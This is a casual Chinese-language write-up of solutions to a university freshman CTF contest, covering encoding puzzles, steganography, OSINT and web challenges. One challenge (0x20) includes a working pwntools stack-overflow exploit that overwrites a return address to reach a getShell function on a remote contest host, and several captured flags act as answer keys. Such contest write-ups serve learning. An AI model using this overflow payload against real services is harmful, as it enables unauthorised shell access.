SDUST 新生赛 by.dayi
0X01
你知道网页的初始界面是什么吗?
用bp的repeter可以做,后来发现其实直接curl就行
[root@oao ~]# curl http://124.70.85.223/web3/index.php
Woodpeckerctf{faster_as_you_can}
[root@oao ~]#curl
0x02 签到
扫码
0x03 百度
woodpecker{Baidu_!}
0x04 福利
flag{Shen_mE_p0_t1_Mu}
0x05 贝斯祝愿你能在大学里找到对象
base64直接解码
0x06 17900 Shimakaze
使用Stegsolve.jar
点几下然后扫码
0x06 邀请你的好舍友过来拍张照吧!!!!
解压后拍照
0x07 你知道凯撒大帝的密码吗?
稍微有点意思
暴力解码凯撒https://paste.ubuntu.com/p/ddQXBc8Vjd/,然后
import base64
for i in range(1,30):
try:
str=input()
print(base64.b64decode(str))
except:
print("wa")
0X08 PWN 1
这个题,用IDAPRO可以得到源代码
0x09开冲!
看键盘找密码
0x10
zip,然后看属性,发现:用winhex
0x11Read python code Please
解密代码如下,反过来就行
ans=[]
resarry=[153, 78, 177, 67, 178, 68, 165, 74, 167, 81, 165, 83, 168, 90, 150, 71, 167, 62, 163, 65, 163, 75, 171, 83, 187, 62, 177, 69, 161, 66, 177, 67, 167, 62, 148, 68, 163, 35, 161, 32, 176, 67, 161, 47, 180, 78, 169, 81, 163, 76, 167, 62, 171, 82, 161, 72, 175, 79, 177, 81, 163, 77, 182, 62, 115, 45, 161, 34, 150, 37, 99, 92]
for i in range(len(resarry)):
print(resarry[71-i])
if i%2==0:
ans.append(resarry[i]-66 +128)
else:
ans.append(resarry[i]+33 +128)
for i in range(len(ans)):
print(chr(ans[i]%128),end="")
print(ans)
0x12新佛与党
新佛曰
和社会主义核心价值观
两个解码组合,不是他们一血那么快我都不知道我方向部队,我还研究了半天的12位进制哈哈哈哈哈
0x13 ezyiiiiiii
油猴脚本是好东西
然后直接F12
0x14快来救救这个可怜的二维码吧!!!!
画图解决
0x15好矮油
是个原题,我承认我百度做的,用winhex然后把01改成11就行了
0x16有手就行
啊啊啊,这个是我瞎子题,先把\n替换,base64,社工hits,考虑生活方面,然后考虑是不是qq号
然后qq名
0x17跳动的音符
好题
https://gchq.github.io/CyberChef/#recipe=XOR(%7B'option':'Hex','string':''%7D,'Standard',false/disabled)XOR_Brute_Force(1,100,0,'Standard',false,true,false,'')&input=dGxsZ3NmYGhmcXgxMzEyXHp6Z3AiIn4
打开这个网页就行
0x18 要happy啊!
社工,看wifi名,有ele.me的图,然后从支付宝找那个wifi名开头的店
0x19 [$1+$2+$3=flag](http://124.70.85.223:8000/challenges#$1+$2+$3=flag)
好烦,截图找不到了,重做
第一步,用连点器结果发现点到60还是不知道是啥,然后还是进了no_flag.php
打开F12看source,发现时间那里有个颜文字加密的js
解密吼
}]V2U})9]
然后进入flag.php
发现字符串拼接
然后在第一步看源代码,发现第一步有注释的php得到part1
然后第二部切换到.network
(第二部源代码提示过要看head)
拼手速
得到part2
拼接后得到flag
0x20 PWN3
根据大佬给的WP,然后直接运行
from pwn import *
context.log_level = 'DEBUG'
context.terminal = ['terminator', '-x' ,'sh' , '-c']
p = remote("43.128.1.238",10001)
elf = ELF("pwn")
#libc = ELF('')
offset = 72
address = elf.symbols['getShell']
p.recv()
payload = 'A' * offset + p64(address).decode('unicode_escape')
p.send(payload)
p.interactive()
0x21Just ook my dear bro
ook解码
0x22 套娃
套娃很严重
将jpg改为zip
然后解压
然后得到2.jpg
用oursec,密码123456可以得到flag.txt
VjJVeFl6QnRaVjlVTUY5WE1EQkVVRVZEUzJWeQ==
base64得到
V2UxYzBtZV9UMF9XMDBEUEVDS2Vy
然后加密大厨可以得到
https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')&input=VjJVeFl6QnRaVjlVTUY5WE1EQkVVRVZEUzJWeQ
嗯就这样
0x23安妮....我的安妮 :-} 嘿嘿嘿
呃,竟然不是word隐写,我方向错了好多次。
后来发现福尔摩斯其实可以允许.==E
于是,福尔摩斯,可以得到一串字母
这个我还找到了您的csdn博客呢!
就这样啦
感受
这次比赛,其实最大的感受就是每次打算学pwn,然后又来题,又要冲前几,特别特别累,还要做别的事情唉。不过还是很开心滴!
谢谢各位大佬出题!
如果有细节不够,欢迎叫我补充!!